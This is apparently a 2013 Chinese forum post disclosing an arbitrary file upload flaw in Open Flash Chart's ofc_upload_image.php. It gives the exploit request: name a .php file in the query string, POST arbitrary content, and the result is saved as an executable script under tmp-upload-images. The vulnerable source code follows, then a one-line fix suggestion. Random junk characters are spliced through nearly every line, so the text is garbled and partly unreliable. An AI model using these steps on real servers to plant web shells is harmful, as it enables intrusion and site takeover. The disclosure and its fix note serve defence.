POST 数据漏洞文件执行任意后缀文件保存4 X! }- g9 a* R& S+ i5 g4 d
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
& V5 k5 T5 Z. F& u5 @$ p% l6 k" v3 ^3 C7 Q u7 e: m2 L
利用:: {! }7 g1 y, X& l, |1 [' ?+ F# z( g
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名2 l4 W. F3 @1 `' N' W; N3 A
4 a' e( Q, z1 D. ]. r& n: N2 B1 G1 ~
Post任意数据
8 s) z( x3 P" G& e3 I0 B保存位置http://localhost/chart/tmp-upload-images/hfy.php
, \8 ^5 [& J }; _! h
$ s5 q& O& u2 i2 b! T/ K& [
- q" g1 R/ c' b+ e最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~. E/ C9 [4 H# |1 ~
3 e# ]) Y9 k0 K* K
<?php/ Q4 U9 n7 j* q
; U- B7 z" m) _9 r9 }/ p& w+ X
//
6 y( r% g1 J2 L. k- j// In Open Flash Chart -> save_image debug mode, you! I0 M6 ~5 `; y, x( @
// will see the 'echo' text in a new window.
" L2 `9 Y- Y) c/ k6 s, k//2 D* X) D% Q, l/ x X) K: j2 b
7 u' I" @% f9 ? E% O# C/*6 Y9 D# j# s( m) r; T
/ @$ v* {* [# T* b W$ Y: a5 v+ }. ~print_r( $_GET );
- P" M; W! I6 d! Yprint_r( $_POST );
& J% f9 [) P0 a7 Z9 `* iprint_r( $_FILES );2 o5 l$ s, ]8 f1 Z
6 l3 n) q \: l8 q3 E! o8 uprint_r( $GLOBALS );
- ^2 F/ K9 v1 X) N/ ~* Bprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
, h; \% U- ?& j' ^# {' s! h( D( X9 k
*/* }( O+ C5 X1 o, t2 R4 ^
// default path for the image to be stored //" S( n3 s4 K1 @: q
$default_path = '../tmp-upload-images/';' e7 t0 \3 v$ l {+ @. c, f
1 U5 I' S! f! z4 K. G. Sif (!file_exists($default_path)) mkdir($default_path, 0777, true);) w+ r" P+ W; U7 e: ^
4 F0 ?! H0 g! c8 g// full path to the saved image including filename //
2 q& u+ o( x& {7 K$destination = $default_path . basename( $_GET[ 'name' ] ); 7 r) R8 U: r/ {% C
7 x& M: ?8 \, I* a. s3 \
echo 'Saving your image to: '. $destination;
% C- s' D5 e! c1 y1 J// print_r( $_POST );
, a7 j4 E9 ^5 I7 Q! ~// print_r( $_SERVER );
( F+ `5 N4 ?; `5 k9 u; m// echo $HTTP_RAW_POST_DATA;+ {. F7 N& w$ I- k
$ Z4 `0 A* Z# {1 m4 ?! [//
( m6 \1 F7 W9 X% D2 ^// POST data is usually string data, but we are passing a RAW .png
; w+ y) A8 x3 R# x// so PHP is a bit confused and $_POST is empty. But it has saved
7 T1 M1 v( @1 g/ {5 S3 E5 v// the raw bits into $HTTP_RAW_POST_DATA
! n& F L, L+ K- u4 X//0 N& N# T! g% i6 [2 E
6 j/ s$ S" o! E0 a3 t+ s8 n$jfh = fopen($destination, 'w') or die("can't open file");6 a4 j0 m7 w8 `. J: U5 W# `. F4 W
fwrite($jfh, $HTTP_RAW_POST_DATA);
5 y: E/ j+ O1 }' U" r) N) pfclose($jfh);- v; ]. }! z5 E6 z
9 Q% k0 i9 s8 p1 j+ K k//; n. N5 }# R4 n
// LOOK:
. x3 y% B# ^- R6 x8 I- P y% _//- `0 q- }' c) Y( m7 |
exit();
q1 R, s& R$ {5 i: X, V//
2 u1 S) p, ?; q3 y' F* l0 l// PHP5:3 P% Z* o9 y, H1 z
//( d' o6 h, x; h# G
2 y8 _/ `; w4 \2 |
4 M' J5 U, T1 \' h) j+ B// default path for the image to be stored //; Z8 k/ s* o1 P6 T8 O! ~& T
$default_path = 'tmp-upload-images/';% s9 B# O: W* n
$ f- @! r: @* Q9 {+ jif (!file_exists($default_path)) mkdir($default_path, 0777, true);$ \& |. e5 G! y s7 E V5 s) e
- |% r5 @) \. C; C' @2 K! t* L& M m+ d
// full path to the saved image including filename //
" [1 z3 D( v* L) o; P+ d$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
; d; D1 M0 b( g
/ l, U5 p8 \. s9 G// move the image into the specified directory //
# R& G5 f6 \( E6 b( M. C. l+ Q. \if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
" \6 m, c& m4 Y+ n; z: X6 K* _: A' c echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";9 [- W- Y/ @' V4 t( R
} else {
# E, L8 N( k5 u, b) y echo "FILE UPLOAD FAILED";
" }$ D. |' K( x% w% g* u' @* B}
- r0 P% W! n/ H/ \6 X0 {9 o1 C* }' S& J, o" Y9 r
4 h6 u& V" H, ~* U: E" T?> {: _/ m! k: z. ?2 M* l- `
9 Z6 p E8 U+ G3 O+ q& ~
) g9 o. o3 K$ a- D/ z: R8 a! q% n, d2 |) v1 g+ B" `
1 n- W( v0 K' H/ \9 U, O: V7 L) e- D
, n% ~, S$ p, t. W1 ], V
* U( S$ j9 T$ R( ?4 c' O0 ^5 a4 E( T修复方案: 8 ]: U# o5 [' f7 B ]1 F4 u
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
1 R! T9 G. @6 Y+ ~$ I& H3 x1 y f
4 U/ e+ {! U" X% y. m+ F D/ f6 ]0 e
0 k' l8 ^0 k+ c/ X6 l9 i) ?5 V5 O% f! Y
|
发表于 2013-2-23 12:38:58
收藏
支持
反对